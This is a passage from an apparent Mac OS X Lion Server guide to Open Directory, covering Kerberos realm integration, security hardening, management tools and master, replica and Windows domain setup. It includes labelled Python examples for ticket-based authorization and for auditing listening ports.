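if __name__ == "__main__":
    for ticket in (ALICE, BOB, CAROL):
        print(authorize(ticket, PSEUDOMASTER_REALM, AFP_ACL))
```

Carol's ticket carries IDs that would match the ACL, but it was not issued by the pseudomaster's realm, so it is refused before the ACL is consulted; that ordering is the point of validating the ticket rather than trusting the IDs it contains.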
You can use cross-domain authorization between an Active Directory server and a Mac OS X Lion Open Directory server or between two Mac OS X Lion Open Directory servers. Cross-domain authorization does not work on a Mac OS X v10.4 server.

To use PAC information, the pseudomaster server must have a Kerberos realm for the subordinate server to join. To create a subordinate for a directory system you must join your server to an Active Directory or Open Directory server that has Kerberos configured and running. Then, using Server Admin, you must promote your Open Directory server to an Open Directory master. The subordinate server determines that it is subordinate to an Active Directory or Open Directory server and configures itself accordingly.

You can also have a replica of your subordinate Open Directory server. To create a replica of a subordinate directory server, join your server to the pseudomaster and subordinate server. Then configure the server to be a replica of the subordinate server. If you don't join the server to both the pseudomaster and subordinate server, it is blocked or fails to become a replica.

Integrating with a magic triangle

A magic triangle, also referred to as the golden triangle, is the connecting of two directory domains where one controls the authentication and the other manages Mac OS X Lion settings. Mac OS X Lion supports the connection of an Active Directory server to an Open Directory server or two Open Directory servers connected together. This creates a magic triangle that is made up of three parts: the directory server providing authentication, the second directory server, and the Mac client computers.

When configuring a magic triangle, one server must be the primary server and the other the secondary server. The secondary server must join the primary server and its Kerberos realm. There can only be one Kerberos realm in a magic triangle.

For example, you can configure an Active Directory server as a primary server to host the Kerberos Distribution Center (KDC) and contain user and group records. Then you can configure an Open Directory server as a secondary server and connect it to the Active Directory server and its Kerberos realm. The Active Directory server manages authentication requests while the Open Directory server manages preference and policy settings of client computers. All services of your Open Directory servers can be Kerberized through the Kerberos realm of the Active Directory server. Client computers are connected to the Active Directory and Open Directory servers.

Integrating with augment records

If you integrate with an existing directory domain using a magic triangle, you can augment user records from the primary directory domain to the secondary directory domain. When you augment user records from a primary directory domain to a secondary directory domain, you can add data to these records. These user records are labeled as augmented in Workgroup Manager. The augmented record information is used by the secondary directory domain and is not viewable from the primary directory domain server where the original records reside.
For example, if you configure a magic triangle with an Active Directory server as the primary server and an Open Directory server as the secondary server, you can augment user records from the Active Directory server to the Open Directory server. After you augment these records you can add information, such as setting a login picture. Augments do not affect the original user record. Augments provide additional information specific to the directory domain the augment user logs in to. By keeping the users in the Active Directory domain and augmenting them into the Open Directory domain, users can use Mac server-specific features. Also, it prevents users from needing two passwords or accounts.

Integrating without schema changes

Mac OS X Lion integrates with most LDAP-based directories without needing to change the schema of your directory server. However, some record types might not be recognized or maintained by your server's directory schema. When you integrate Mac computers with your directory server, you might want to add a record type or object class to the directory schema to better manage and support Mac client computers. For example, by default there may not be a Picture record type in your directory schema for Mac users, but you can add it to your directory schema so Picture records can be stored in the directory database. To add records or attributes to your directory schema, consult your directory domain administrator for instructions.

Integrating with schema changes

If you are adding Mac computers to a directory domain, you can make schema changes to the directory domain server to better support Mac client computers. When you add a record type or attribute to the directory schema, investigate whether you have a record type or attribute that can map to it in the existing schema. If you don't have a similar record type or attribute that you can map to, add the record type or attribute to your schema.
This is referred to as extending your schema. When you extend your schema you might need to change the default access control list (ACL) of specific attributes so computer accounts can read the user properties. For example, you can configure a Mac to access basic user account information in an Active Directory domain of a Windows 2000 or Windows 2003 or later server.

Avoiding Kerberos conflicts with multiple directories

If you set up an Open Directory master on a network that has an Active Directory domain, your network will have two Kerberos realms: an Open Directory Kerberos realm and an Active Directory Kerberos realm. For practical purposes, other servers on the network can use only one Kerberos realm. When you set up a file server, mail server, or other server that can use Kerberos authentication, you must choose one Kerberos realm.

A Mac server must belong to the same Kerberos realm as its client users. The realm has only one authoritative Kerberos server, which is responsible for all Kerberos authentication in the realm. The Kerberos server can only authenticate clients and servers in its realm. The Kerberos server can't authenticate clients or services that are part of a different realm. Only user accounts in the chosen Kerberos realm will have single sign-on abilities. User accounts in the other realm can still authenticate, but they won't have single sign-on.

If you're configuring a server to access multiple directory systems and each has a Kerberos realm, plan carefully for the user accounts that will use Kerberized services. You must know the intent of having access to two directory services. You must join the server to the realm whose companion directory domain contains the user accounts that must use Kerberos and single sign-on.

For example, you might want to configure access to an Active Directory realm for its user records and an Open Directory LDAP directory for the Mac OS X Lion records and attributes that aren't in Active Directory, such as group and computer records. Other servers could join the Active Directory Kerberos realm or the Open Directory Kerberos realm. In this case, the other servers should join the Active Directory Kerberos realm so Active Directory user accounts have single sign-on. If you also have user accounts in the Open Directory server's LDAP directory, users can still authenticate to them, but the Open Directory user accounts won't use Kerberos or have single sign-on. They'll use Open Directory Password Server authentication methods. You could put all Mac users in the Open Directory domain and all Windows users in the Active Directory domain, and they could all authenticate, but only one population could use Kerberos.

Do not configure an Open Directory master or replica to also access an Active Directory domain (or any other directory domain with a Kerberos realm).
If you do, the Open Directory Kerberos realm and the Active Directory Kerberos realm will try to use the same configuration files on the Open Directory server, which disrupts Open Directory Kerberos authentication.

To avoid a Kerberos configuration file conflict, don't use an Open Directory server as a workstation for managing users in another Kerberos server's directory domain, such as an Active Directory domain. Instead, use an administrator computer (a Mac computer with server administration tools installed) that's configured to access the related directory domains. If you must use an Open Directory server to manage users in another server's directory domain, make sure the other directory domain is not part of the Open Directory server's authentication search policy.

To further avoid a Kerberos configuration file conflict, don't use an Open Directory server to provide services that access a different Kerberos server's directory domain. For example, if you configure AFP file service to access Open Directory and Active Directory, don't use an Open Directory server to provide the file service. Use another server and join it to the Kerberos realm of one directory service or the other.

Theoretically, servers or clients can belong to two Kerberos realms, such as an Open Directory realm and an Active Directory realm. Multiple-realm Kerberos authentication requires very advanced configuration, which includes setting up Kerberos servers and clients for cross-realm authentication, and revising Kerberized service software so it can belong to multiple realms.

To configure your network to use one Kerberos realm providing single sign-on for two directory domains, such as Active Directory and Open Directory, disable Kerberos on your Open Directory master and connect it to the Active Directory domain. This provides a Kerberos realm for both directory domains and Kerberized services. Also, users on either domain can use single sign-on authentication.

For more information about disabling Kerberos on an Open Directory master, see Disable Kerberos after setting up an Open Directory master.


Improve directory service performance


You can improve the performance of Open Directory services by adding memory to the server and having it provide fewer services. This strategy also applies to every other service of a Mac server. The more you can dedicate an individual server to a specific task, the better its performance is.

Beyond that general strategy, you can also improve Open Directory server performance by assigning the LDAP database to its own disk and the Open Directory logs to another disk.

If your network includes replicas of an Open Directory master, you can improve network performance by scheduling less-frequent updates of replicas. Updating less frequently means the replicas have less up-to-date directory data, so you must strike a balance between higher network performance and less accuracy in your replicas.

For greater redundancy of Open Directory services, set up extra servers as Open Directory replicas or use servers with RAID sets.


Open Directory security


With Lion Server, a server with a shared LDAP directory domain also provides Open Directory authentication. It is important to protect the authentication data stored by Open Directory. This authentication data includes the Open Directory Password Server database and the Kerberos database, which must also be protected. Therefore, make sure an Open Directory master and all Open Directory replicas are secure by following these guidelines:

Keep your server behind a locked door, and always log it out. Physical security of a server that is an Open Directory master or replica is paramount.
Secure the media you use to back up an Open Directory Password Server database and a Kerberos database. Having your Open Directory servers behind locked doors won't protect a backup tape that you leave on your desk.
Do not use a server that is an Open Directory master or replica to provide other services. If you can't dedicate servers to be Open Directory masters and replicas, minimize the number of services they provide. One of the other services could have a security breach that gives someone access to the Kerberos or Open Directory Password Server databases. Dedicating servers to provide Open Directory services is an optimal practice but is not required.
Set up service access control lists (SACLs) for the login window and secure shell (SSH) to limit who can log in to an Open Directory master or replica.
Avoid using a RAID volume that's shared with other computers as the startup volume of a server that is an Open Directory master or replica. A security breach on one of the other computers could jeopardize the security of the Open Directory authentication information.
Set up the firewall service to block all ports except those listed here for directory, authentication, and administration protocols:
Open Directory Password Server uses ports 106 and 3659.
The Kerberos KDC uses TCP/UDP port 88, and TCP/UDP port 749 is used for Kerberos administration.
The shared LDAP directory uses TCP port 389 for an ordinary connection and TCP port 636 for an SSL connection.
Workgroup Manager uses TCP ports 311 and 625.
Server Admin uses TCP port 311.
SMB uses TCP/UDP ports 137, 138, 139, and 445.

In summary, the most secure and best practice is to:

Equip the Open Directory master computer with an uninterruptible power supply.
Dedicate each server that is an Open Directory master or replica to provide only Open Directory services.
Set up a firewall on these servers to provide only the following: directory access, authentication, and administration protocols (LDAP, Password Server, Kerberos, and Workgroup Manager).
Physically secure each Open Directory server and all backup media used with it.

Replicating directory and authentication data over the network is a minimal security risk. Password data is securely replicated using random keys negotiated during each replication session. The authentication portion of replication traffic, the Open Directory Password Server and the Kerberos KDC, is fully encrypted. For extra security, configure network connections between Open Directory servers to use network switches rather than hubs. This isolates authentication replication traffic to trusted network segments.

Service access control lists (SACLs)

Mac OS X Lion uses SACLs to authorize user access to a service. SACLs are made up of access control entries (ACEs) that determine the access privileges a user has to a service. You can use SACLs to allow or deny user access to an Open Directory master or replica by setting SACLs for the login window and SSH. This restricts access to the service. You can also use SACLs to set administrator access to Open Directory. This does not restrict access to the service; instead, it specifies who can administer or monitor the service. For more information about setting administrator SACLs, see Configure Open Directory service access control.

SACLs provide greater control when specifying the administrators that have access to monitor and manage the service. Only users and groups listed in an SACL have access to its corresponding service. For example, to give administrator access to users or groups for the Open Directory service on your server, add them to the Open Directory SACL as an ACE.
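The port list in the firewall guideline above doubles as an audit baseline for a dedicated Open Directory master: anything else listening is a service the guideline says should not be there. The following added example, not code from Lion Server, parses listening sockets in the format that `netstat -an` prints on Mac OS X and reports every listener outside that list. The netstat output is constructed for the example; the page does not state whether Password Server's ports 106 and 3659 are TCP or UDP, so both are accepted here as an assumption.

```python
"""Audit an Open Directory server's listening ports against the guide's list.

Added example, not code from the Lion Server guide. It parses constructed
`netstat -an`-style lines (Mac OS X format) and reports every listening
socket outside the directory, authentication, and administration ports
the guide lists for a dedicated Open Directory master or replica.
"""
import re
from typing import Iterator, List, Tuple

# (protocol, port) pairs from the firewall guideline above. The guide gives
# no protocol for Password Server's 106 and 3659, so both are accepted here.
ALLOWED = {
    ("tcp", 106), ("udp", 106), ("tcp", 3659), ("udp", 3659),  # Password Server
    ("tcp", 88), ("udp", 88), ("tcp", 749), ("udp", 749),      # Kerberos KDC, admin
    ("tcp", 389), ("tcp", 636),                                # LDAP, LDAP over SSL
    ("tcp", 311), ("tcp", 625),                                # Server Admin, Workgroup Manager
    ("tcp", 137), ("udp", 137), ("tcp", 138), ("udp", 138),
    ("tcp", 139), ("udp", 139), ("tcp", 445), ("udp", 445),    # SMB
}

# proto, recv-q, send-q, local address, foreign address, optional state
LINE_RE = re.compile(r"^(tcp|udp)[46]?\s+\d+\s+\d+\s+(\S+)\s+(\S+)(?:\s+(\S+))?")

# Constructed sample: LDAP, LDAPS and the KDC are expected; web (80), AFP (548)
# and mDNS (5353) are the kind of extra services the guide says to avoid.
SAMPLE_NETSTAT = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  *.389                  *.*                    LISTEN
tcp4       0      0  *.636                  *.*                    LISTEN
tcp4       0      0  *.88                   *.*                    LISTEN
tcp4       0      0  *.80                   *.*                    LISTEN
tcp4       0      0  *.548                  *.*                    LISTEN
tcp4       0      0  10.1.1.1.389           10.1.1.50.52344        ESTABLISHED
udp4       0      0  *.88                   *.*
udp4       0      0  *.5353                 *.*
"""


def listeners(netstat_output: str) -> Iterator[Tuple[str, int, str]]:
    """Yield (proto, port, local_addr) for each listening socket in the output."""
    for line in netstat_output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                       # headers and unrelated lines
        proto, local, foreign, state = m.groups()
        addr, _, port = local.rpartition(".")  # Mac OS X separates port with "."
        if not port.isdigit():
            continue
        if proto == "tcp" and state != "LISTEN":
            continue                       # established or closing connections
        if proto == "udp" and foreign != "*.*":
            continue                       # connected UDP socket, not a listener
        yield proto, int(port), addr


def unexpected_listeners(netstat_output: str) -> List[Tuple[str, int, str]]:
    """Listeners that fall outside the guide's allowed port list."""
    return sorted(entry for entry in listeners(netstat_output)
                  if (entry[0], entry[1]) not in ALLOWED)


if __name__ == "__main__":
    for proto, port, addr in unexpected_listeners(SAMPLE_NETSTAT):
        print(f"unexpected listener: {proto} {addr}:{port}")
```

On a real server the function would be fed the output of `netstat -an`; the report lists only what is outside the baseline, so an empty result is the state the guideline describes for a dedicated master.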


Manage Open Directory services


The Server Admin, Directory Utility, and Workgroup Manager applications provide a graphical interface for managing Open Directory services in Lion Server. In addition, you can manage Open Directory services from the command line by using Terminal.

These applications are included with Lion Server and can be installed on another computer with Mac OS X Lion, making that computer an administrator computer. You can also install Server Admin on a computer with Mac OS X Lion and use it to manage Open Directory on any server on your local network and elsewhere. You can also manage Open Directory remotely by using command-line tools from a Mac computer or a non-Macintosh computer.

Server Admin

Server Admin provides access to tools you use to set up, manage, and monitor Open Directory services and other services. You use Server Admin to:

Set up a Mac server as an Open Directory master, an Open Directory replica, a server that's connected to a directory system, or a standalone directory service with only a local directory domain. For more information, see Set up Open Directory services.
Set up more Mac server systems to use the Kerberos KDC of an Open Directory master or replica. For more information, see Set up Open Directory services.
Configure LDAP options on an Open Directory master. For more information, see Set up Open Directory services.
Configure DHCP service to supply an LDAP server address to Mac computers with automatic search policies.
Set up password policies that apply to all users who don't have overriding individual password policies. For more information, see Set password policies for users.
Monitor Open Directory services. For more information, see Maintaining Open Directory Services.

Server Admin is in /Applications/Server/.

Directory Utility

Directory Utility determines how a Mac computer uses directory services, discovers network services, and searches directory services for authentication and contacts information.
You use Directory Utility to:

Configure advanced connections to LDAP directories, an Active Directory domain, and a Network Information Services (NIS) domain
Configure data mapping for LDAP directories
Define policies for searching multiple directory services for authentication and contact information
Enable or disable types of directory services and types of network service discovery
View directory entries in raw form by using Directory Editor. For more information, see View or edit directory data.

Directory Utility can connect to other servers on your network so you can configure them remotely. For more information about using Directory Utility, see Directory Utility Help. Directory Utility is installed on every Mac and can be accessed through Users & Groups preferences.

Server app

The Server app provides management of Mac server users. Use the Server app to:

Set up and manage user accounts and group accounts. For more information, see Server app help.
Manage share points for file services. For more information, see the sections on file sharing in the Server app help.

Workgroup Manager

Workgroup Manager provides comprehensive management of Mac OS X Server clients. You use Workgroup Manager to:

Set up and manage user accounts, group accounts, and computer groups.
Manage share points for file services and user home folders.
Control what Mac OS X users see when they select the Network globe in a Finder sidebar.
View directory entries in raw form by using the Inspector.

For information about using Workgroup Manager, see Workgroup Manager Help. Workgroup Manager is installed in /Applications/Server/.

Command-line tools

A full range of command-line tools is available for administrators who prefer to use command-driven server administration. For remote server management, submit commands in an SSH session. You can enter commands on Mac servers and computers using Terminal, located in /Applications/Utilities/.

Lion Server user management

Open Directory services

Set up Open Directory

Set up Open Directory services


Open Directory services, directory services and authentication services, are an essential part of a network's infrastructure. These services have a significant effect on other network services and on users. Therefore you must set up Open Directory correctly from the beginning.

Here is a summary of the major tasks you perform to set up Open Directory services. For detailed information about each step, see the pages indicated.

Before you begin, do some planning

Before setting up Open Directory services for the first time:

Understand the uses of directory data and assess your directory needs. Identify the services that require data from directory domains and determine which users need access to those services. Users whose information can be managed most easily on a server should be defined in the shared LDAP directory of a Mac server that is an Open Directory master. Some of these users can be defined in directory domains on other servers, such as an Active Directory domain on a Windows server. These concepts are discussed in Open Directory and directory services.
Assess whether you need more than one shared domain. If so, decide which users will be defined in each shared domain. For more information, see Open Directory search policies.
Determine which authentication options users need. For available options, see Monitor Open Directory authentication.
Decide whether to have replicas of your Open Directory master. For guidelines, see Open Directory planning.
Select server administrators carefully. Provide administrator passwords only to people you trust. Have as few administrators as possible. Don't delegate administrator access for minor tasks, such as changing settings in a user record. Directory information vitally affects everyone whose computers use it.

Turn on Open Directory service

Use Server Admin to turn the Open Directory service on. After the service is on, you can configure Open Directory service settings.
For more information about turning on Open Directory service, see Turn on Open Directory service.

Set up a standalone directory service

To set up servers that won't get authentication and other administrative information from another directory service, see Set up a standalone directory service.

Set up an Open Directory master

To set up a server to provide directory and authentication services, see Replicate Open Directory services and Set up an Open Directory master.

Set up an Open Directory replica

To set up servers to provide failover directory and authentication services or remote directory and authentication services for fast client interaction on distributed networks, see Set up an Open Directory replica or relay.

Set up Open Directory relays for cascading replication

To set up a server to be a replica or relay of an Open Directory master so it can provide directory information and authentication information to computers, see Replicate Open Directory services.

Set up servers that connect to other directory systems

If you have file servers or other servers that access directory and authentication services, see Configure access to an Open Directory server.

Set up single sign-on Kerberos authentication

If you have an Open Directory master, you can configure other servers to join its Kerberos realm. If you set up an Open Directory master without Kerberos, you can set up Kerberos later. For more information, see Set up single sign-on Kerberos authentication.

Set up client computers to connect to directory services

If you have an Open Directory master, you must configure client computers to access its directory domain. You can also configure computers to access other directory services such as Microsoft Active Directory. See Configure access to an Open Directory server and Configure access to an Active Directory domain.


Turn on Open Directory service


Before you can configure Open Directory settings , you must turn on Open Directory service in Server Admin.

1. Open Server Admin and connect to the server.
2. Click Settings.
3. Click Services.
4. Select the Open Directory checkbox.
5. Click Save.


Set up a standalone directory service


Using Server Admin, you can set up a Mac server to use only the server's local directory domain. The server does not provide directory information to other computers or get directory information from an existing system. (The local directory domain can't be shared.)

If you change a Mac server to get directory information only from its local directory domain, user records and other information that the server retrieved from a shared directory domain become unavailable. The user records and other information in the shared directory domain are deleted. Files and folders on the server can become unavailable to users whose accounts are in the shared directory domain.

If the server was an Open Directory master and other servers were connected to it, the following can occur:

Services can be disrupted on the connected servers when user accounts and other information in the shared directory domain become unavailable.
Users whose accounts are in the shared directory domain might not be able to access files and folders on the Open Directory master and on other servers that were connected to its shared LDAP directory domain.

You can archive a copy of the Open Directory master's directory and authentication data before changing it to an Open Directory standalone directory service. For more information, see Archive an Open Directory master. You can also export users, groups, and computer groups from the Open Directory master before changing it to a standalone directory service.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click General.
5. Click Change. The Open Directory Assistant opens.
6. Choose from the following:
If your server is an Open Directory master, select "Destroy Master and set up standalone directory," then click Continue.
If your server is an Open Directory replica, select "Decommission replica and set up standalone directory," click Continue, enter the root password for the Open Directory master, enter the domain administrator's login credentials, and then click Continue.
7. Confirm the configuration setting, then click Continue.
8. If you are sure that users and services no longer need access to the directory data stored in the shared directory domain that the server has been hosting or is connected to, click Done.


Set up an Open Directory master


Using Server Admin, you can set up a Mac server to be an Open Directory master so it can provide directory information and authentication information to other systems. Lion Server provides directory information by hosting a shared LDAP directory domain. In addition, the server authenticates users whose accounts are stored in the shared LDAP directory domain.

An Open Directory master has an Open Directory password server, which supports all conventional authentication methods required by Lion Server services. In addition, an Open Directory master can provide Kerberos authentication for single sign-on.

If you want the Open Directory master to provide Kerberos authentication for single sign-on, DNS must be available on the network and must be correctly configured to resolve the fully qualified DNS name of the Open Directory master server to its IP address. DNS must also be configured to resolve the IP address to the server's fully qualified DNS name.

Important: If you're changing an Open Directory replica to an Open Directory master, the procedure you follow depends on whether the replica replaces the master or becomes an extra master:

To promote a replica to replace a nonfunctional master, follow the instructions in Promote an Open Directory replica instead of the instructions here.
To change a replica to an extra master, decommission the replica as described in Decommission an Open Directory replica, then make it a master by following the steps in this topic.

Note: If a Mac server was connected to a directory system and you make the server an Open Directory master, it remains connected to the other directory system. The server searches for user records and other information in its shared LDAP directory domain before searching in other directory systems it is connected to.

Important: If your Lion Server is an Open Directory master, it has a diradmin user. When binding two directory servers, they should not have the same directory administrator user name (diradmin). If two Lion Servers are configured as Open Directory masters and are bound to each other, they become an invalid configuration and can cause random failures. Make one of the Open Directory master servers a standalone server, then recreate it using Server Admin with a unique username for the directory administrator instead of the default diradmin.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click General. If the Role option is set to Open Directory Replica and you want to make a new Open Directory master, change the server role to Standalone. For more information, see Setting Up a Standalone Directory Service. If you want to change an Open Directory replica to a master, promote the replica to be a master instead of making a new master. For more information, see Promote an Open Directory replica.
5. Click Change. This opens the Open Directory Assistant.
6. Select "Set up an Open Directory Master," then click Continue. If your DNS server is not configured, a message about single sign-on being unavailable appears. To use single sign-on, close the assistant and configure your DNS. If you don't want to use single sign-on, click Continue to configure your Open Directory master without single sign-on.
7. Enter the following Master Directory Administrator information, then click Continue:
   Name, Short Name, User ID, Password: You must create a user account for the primary administrator of the LDAP directory. This account is not a copy of the administrator account in the server's local directory domain. Make the names and user ID of the LDAP directory administrator different from the names and user IDs of user accounts in the local directory domain. Also, to prevent the directory administrator account from being listed in the login window, assign the directory administrator account a user ID below 100. Accounts with user IDs below 100 are not listed in the login window.
   Note: To connect your Open Directory Master to other directory domains, specify a unique name and user ID for each domain. Don't use the suggested diradmin user ID. Use a name that helps you distinguish the directory domain that the directory administrator controls.
8. Enter the following Master Domain information, then click Continue:
   Kerberos Realm: This field is set to the server's DNS name, converted to capital letters. This is the convention for naming a Kerberos realm. You can enter a different name if necessary.
   Search Base: This field is set to a search base suffix for the new LDAP directory, derived from the domain portion of the server's DNS name. You can enter a different search base suffix or leave it blank. If you leave this field blank, the LDAP directory's default search base suffix is used.
9. Confirm settings, then click Continue.
10. Confirm that the Open Directory master is functioning by clicking Overview (near the top of the Server Admin window, with Open Directory selected in the Servers list). The status of items listed in the Open Directory overview pane should say Running. If Kerberos remains stopped and you want it running, see If Kerberos is stopped on an Open Directory master or replica.

After setting up a Mac server to be an Open Directory master, you can change its binding policy, security policy, password policy, replication frequency, and LDAP protocol options. For more information, see Set a binding policy for an Open Directory server, Set the search timeout interval for LDAP service, and Set a security policy for an Open Directory server. You can configure other computers with Mac OS X Lion or Mac OS X Lion Server to access the server's shared LDAP directory domain. For more information, see Configure access to an LDAP directory.


Set up Windows 2000 for domain login


You can enable domain login on a Windows 2000 computer by joining it to an Open Directory Lion Server. Joining the Windows domain requires the name and password of an LDAP directory administrator account. You can delegate this task to someone with a local administrator account on the Windows computer. In this case, you may want to create a temporary LDAP directory administrator account with limited privileges.

1. Log in to Windows 2000 using a local administrator account.
2. Open the Control Panel, then open System.
3. Click Network Identification, then click Properties.
4. Enter a computer name, click Domain, enter the domain name of the Open Directory Lion Server, and click OK. To look up the domain name of the server, open Server Admin on the server or an administrator computer, select Open Directory in the Servers list, click Settings, then click General.
5. Enter the name and password of an LDAP directory administrator and click OK.


Set up Windows XP for domain login


You can enable domain login on a Windows XP computer by joining it to an Open Directory Lion Server. Joining the Windows domain requires the name and password of an LDAP directory administrator account. You can delegate this task to someone with a local administrator account on the Windows computer. In this case, you may want to create a temporary LDAP directory administrator account with limited privileges.

1. Log in to Windows XP using a local administrator account.
2. Open the Control Panel, then open System.
3. Click Computer Name, then click Change.
4. Enter a computer name, click Domain, enter the domain name of the Open Directory Lion Server, and click OK. To look up the domain name of the server, open Server Admin on the server or an administrator computer, select Open Directory in the Servers list, click Settings, then click General.
5. Enter the name and password of an LDAP directory administrator and click OK.


Set up Windows Vista or Windows 7 for domain login


You can enable domain login on a Windows Vista or Windows 7 computer by joining it to an Open Directory Lion Server. Joining the Windows domain requires the name and password of an LDAP directory administrator account. You can delegate this task to someone with a local administrator account on the Windows computer. In this case, you might want to create a temporary LDAP directory administrator account with limited privileges.

Note: Only Windows Vista Ultimate, Windows Vista Business edition, Windows 7 Ultimate, and Windows 7 Professional can connect to a domain.

1. Log in to Windows Vista using a local administrator account.
2. Open the Control Panel, then open System and Maintenance (Windows Vista) or System and Security (Windows 7).
3. Click System, then click Change Settings.
4. Click Computer Name, then click Change.
5. Enter a computer name, click Domain, enter the domain name of the Open Directory Lion Server, and click OK. To look up the domain name of the server, open Server Admin on the server or an administrator computer, select Open Directory in the Servers list, click Settings, then click General.
6. Enter the name and password of an LDAP directory administrator and click OK.


Set up an Open Directory replica or relay


Using Server Admin, you can set up a Mac server to be a replica or relay of an Open Directory master so it can provide the same directory information and authentication information to other systems as the master. The replica or relay server hosts a read-only copy of the master's LDAP directory domain. The replica or relay server also hosts a read/write copy of the Open Directory Password Server and the Kerberos Key Distribution Center (KDC). A replica is considered to be a relay if it is a direct member of the Open Directory master and it has replicas.

Open Directory replicas or relays provide these benefits:
- In a wide area network (WAN) of local area networks (LANs) interconnected by slow links, replicas on the LANs provide servers and client computers with fast access to user accounts and other directory information.
- A replica provides redundancy. If the Open Directory master fails, computers connected to it switch to a nearby replica. This automatic failover behavior is a feature of Mac OS X and Mac OS X Server v10.4 and 10.5 or later.

Note: If your network has a mix of Mac OS X Server version 10.6 and Lion Server, one version can't be a replica of a master of the other version. An Open Directory master of Lion Server won't replicate to Mac OS X Server v10.6, nor will an Open Directory master of Mac OS X Server v10.6 replicate to Lion Server.

When you set up an Open Directory replica, all directory and authentication data must be copied to it from the Open Directory master. Replication can take several seconds or several minutes, depending on the size of the directory domain. Replication over a slow network link can take a long time. During replication, the master cannot provide directory or authentication services. You can't use user accounts in the master LDAP directory to log in or authenticate for services until replication is finished. To minimize the disruption of directory service, set up a replica before the master LDAP directory is fully populated or at a time of day when the directory service is not needed. Having another replica set up will insulate clients of directory service from problems if the master becomes unavailable.

To make more than one server a replica of an Open Directory master, create the replicas one at a time. If you try to create two replicas simultaneously, one attempt succeeds and the other fails. A subsequent attempt to establish the second replica should succeed.

You can have up to 32 replicas of an Open Directory master. These direct members of the Open Directory master server are known as relays. Each relay can have up to 32 replicas of itself, giving you 1056 replicas in a two-tier hierarchy.

If you change a Mac server that was connected to another directory system to be an Open Directory replica, the server remains connected to the other directory system. The server searches for user records and other information in its shared LDAP directory domain before searching in other directory systems it is connected to.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory. Click Settings, then click General.
4. Click Change. The Open Directory Assistant opens.
5. Choose Set up an Open Directory Replica, then click Continue.
6. Enter the following requested information:
   IP address or DNS name of Open Directory master: Enter the IP address or DNS name of the server that is the Open Directory master.
   Root password on Open Directory master: Enter the password of the Open Directory master system's root user (user name System Administrator).
   Domain administrator's short name: Enter the name of an LDAP directory domain administrator account.
   Domain administrator's password: Enter the password of the administrator account whose name you entered.
7. Click Continue.
8. Confirm the Open Directory configuration settings, then click Continue.
9. Click Close.
10. Make sure the date, time, and time zone are correct on the replica and the master. The replica and the master should use the same network time service so their clocks remain in sync.

After you set up an Open Directory replica, other computers will connect to it as needed.

Computers with v10.3 or v10.4 of Mac OS X or Mac OS X Server maintain a list of Open Directory replicas. If one of these computers can't contact the Open Directory master for directory and authentication services, the computer connects to the nearest replica of the master. You can configure Macs to connect to an Open Directory replica instead of the Open Directory master for directory and authentication services. On each Mac computer, you can use Users & Groups preferences to create an LDAPv3 configuration for accessing the replica's LDAP directory. The Open Directory master updates the replica. You can configure the master to update its replicas at a specific interval or whenever the master directory changes.


Open Directory failover


If an Open Directory master or its replicas become unavailable, client computers that use Mac OS X v10.5 or later find an available replica and connect to it.

Replicas only permit clients to read directory information. Directory information about a replica can't be modified with administration tools such as Workgroup Manager.

Users whose password type is Open Directory can change their passwords on computers that are connected to Open Directory replicas. The replicas synchronize password changes with the master. If the master is unavailable for a while, the replicas synchronize password changes with the master when it becomes available again.

If the Open Directory master fails permanently and you have a current archive of its data, you can restore the data to a new master. Alternatively, you can promote a replica to be the master. For more information, see Restore an Open Directory master and Promote an Open Directory replica.

If you replace a failed master by promoting a replica to be the master, you can manually reconfigure each computer and server to connect to this new master or one of its replicas. You do this by using Account preferences (or Directory Utility for advanced connections) on each computer or server to create an LDAPv3 configuration that specifies how the computer accesses the new master or an available replica.


Set up a connection to a directory server


Using Server Admin, you can set up a Mac server to get user records and other directory information from another server's shared directory domain. The other server also provides authentication for its directory information. A Mac server still gets directory information from its own local directory domain and provides authentication for this local directory information.

Important: Changing a Mac server to be connected to another directory system instead of being an Open Directory master turns off its shared LDAP directory domain, with the following ramifications:
- User records and other information in the shared directory domain are deleted.
- If other servers were connected to the master directory domain, their services may be disrupted when user accounts and other information in the deactivated directory domain become unavailable.
- Users who had accounts in the deactivated directory domain might not be able to access files and folders on the Open Directory master and on other servers that were connected to the master directory domain.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click General.
5. Click Change. The Open Directory Assistant opens.
6. Choose Connected to another directory, then click Continue.
7. Confirm the configuration settings, then click Continue.
8. If the server was an Open Directory master and you are sure that users and services no longer need access to the directory data stored in the shared directory domain that the server has been hosting, click Done.
9. Click the Open Directory Utility button to configure access to directory systems.
10. If the server you're configuring has access to a directory system that also hosts a Kerberos realm, you can join the server to the Kerberos realm. To join the Kerberos realm, you need the name and password of a Kerberos administrator or a user who has been delegated the authority to join the realm. For more information, see Join a server to a Kerberos realm.


Set up a server as an Active Directory domain member


Using Server Admin and Users & Groups preferences (or Directory Utility for advanced connections), you can set up a Mac server to join an Active Directory domain hosted by a Windows 2000 or 2003 server. A server that joins an Active Directory domain can provide file, print, and other services to users with accounts in the Active Directory domain. The domain member server gets authentication services from Active Directory. The domain member server does not provide authentication services to other domain member servers.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click General.
5. Click Change. The Open Directory Assistant opens.
6. Choose Connected to another directory, then click Continue.
7. Confirm the Open Directory configuration settings, then click Continue.
8. Click Done.
9. To configure advanced settings for your Active Directory connection, click Open Directory Utility. For more information about advanced connections to an Active Directory server, see Configure access to an Active Directory domain. Begin at step 4.
10. Open System Preferences and click Accounts.
11. In the lower left corner of System Preferences, click the lock and authenticate when prompted.
12. Click Login Options.
13. Click Directory Services.
14. Click the Add button (+).
15. From the "Add a new directory of type" pop-up menu, choose Active Directory, then enter the following:
   Active Directory Domain: Specify the DNS name of the Active Directory server.
